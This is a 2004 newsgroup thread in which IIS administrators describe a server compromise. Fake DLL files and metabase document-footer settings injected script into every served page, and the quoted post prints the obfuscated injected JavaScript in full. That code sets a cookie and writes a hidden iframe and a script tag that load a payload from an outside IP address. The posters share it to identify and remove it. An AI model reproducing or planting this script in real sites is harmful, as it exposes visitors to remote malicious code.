Re: Russian IIS hack? Malicious Javascript code

From: Ron Guyor (rong_at_youngsinc.com)
Date: 06/24/04


Date: Thu, 24 Jun 2004 10:01:09 -0400

I hate to see this happening but it's good to know we're not alone. I've
removed the footer entries and removed the .dll files. I'm going to look for
the .exe file right now.

Ron

"Oca Hoeflein" <Oca Hoeflein@discussions.microsoft.com> wrote in message
news:F5E81692-8CC7-471B-9751-3A9C69ECB013@microsoft.com...
> I successfully removed some malicious code from my IIS 5.0 server that may
not have had all it's patches updated, but I cannot find any information on
this malicious code that redirected on a random basis the users of my
websites to a russian website that appeared to be down. to a domain called
balamut.com
> with an IP address of 217.107.218.147 which RDNS to
> unassigned.m10-msk-ru.e-neverland.net
>
> The javascript code lived in some fake dll files in the inetsrv folder.
> One fake .dll file was created for each web on my server and in the IIS
metabase the defaultdocfooter was set to each of the dll files and
enabledocfooter was set to true.
>
> the offending code was embedded in every file that the website delivered
and pages that had embedded .js files the javascript for those pages would
not function.
>
> I have posted the offending code, mabye someone can identify this?
>
> As proof check out a google search for one of the function in the code
okx12()
>
> you'll see the first link it returns is an RTF if you view the html
version you'll see this code appended to the bottom of the page.
>
> <script language="JavaScript"><!--
> var qxco7=document.cookie;function gc099(n21){var
ix=qxco7.indexOf(n21+"=");if(ix==-1)return
null;ix=qxco7.indexOf("=",ix)+1;var
es=qxco7.indexOf(";",ix);if(es==-1)es=qxco7.length;return
unescape(qxco7.substring(ix,es));}function sc088(n24,v8){var today=new
Date();var expiry=new
Date(today.getTime()+600000);if(v8!=null&&v8!="")document.cookie=n24+"="+esc
ape(v8)+"; expires="+expiry.toGMTString();qxco7=document.cookie;}function
okx12(){window.status="";setTimeout("okx12()",
200);}okx12();if(location.href.indexOf("https")!=0){if(gc099("trk716")==null
){document.write("<script language=\"JavaScript\"
src=\"http://217.107.218.147/dot.php\"></script><iframe
src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\"
scrolling=\"no\"
frameborder=\"no\"/>");sc088("trk716","4");}}// --></script>
>
>